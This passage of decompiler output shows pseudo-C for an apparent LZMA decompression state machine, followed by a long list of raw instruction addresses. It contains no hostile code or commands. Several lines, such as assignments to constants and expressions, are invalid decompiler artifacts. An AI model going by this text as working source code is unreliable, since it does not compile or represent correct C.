                                                          							_t156 = __ebp - 0x70;
                                                          							 *_t156 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t156;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							while(1) {
                                                          								L48:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x58);
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx =  *(__ebp - 0x10);
                                                          								__esi = __edx + __eax;
                                                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          								__ax =  *__esi;
                                                          								 *(__ebp - 0x54) = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          								__eflags =  *(__ebp - 0xc) - __ecx;
                                                          								if( *(__ebp - 0xc) >= __ecx) {
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          									__cx = __ax;
                                                          									_t170 = __edx + 1; // 0x1
                                                          									__ebx = _t170;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									 *(__ebp - 0x10) = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          							L54:
                                                          							_t173 = __ebp - 0x34;
                                                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          							__eflags =  *_t173;
                                                          							goto L55;
                                                          						case 0xf:
                                                          							L58:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xf;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t203 = __ebp - 0x70;
                                                          							 *_t203 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t203;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L60:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L55:
                                                          								__al =  *(__ebp - 0x44);
                                                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          								goto L56;
                                                          							}
                                                          							L61:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t217 = __edx + 1; // 0x1
                                                          								__ebx = _t217;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L60;
                                                          							} else {
                                                          								goto L58;
                                                          							}
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							goto L69;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							L56:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1a;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x68);
                                                          							__al =  *(__ebp - 0x5c);
                                                          							__edx =  *(__ebp - 8);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          							 *( *(__ebp - 0x68)) = __al;
                                                          							__ecx =  *(__ebp - 0x14);
                                                          							 *(__ecx +  *(__ebp - 8)) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t192 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t192;
                                                          							goto L79;
                                                          						case 0x1b:
                                                          							goto L75;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = _t414;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x004070ab
                                                          0x004070ab
                                                          0x004070af
                                                          0x00407166
                                                          0x00407169
                                                          0x00407175
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00000000
                                                          0x0040743e
                                                          0x004070b5
                                                          0x004070b9
                                                          0x004075fa
                                                          0x004075fa
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x004070bf
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x00000000
                                                          0x004075f6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x00000000
                                                          0x00406dec
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
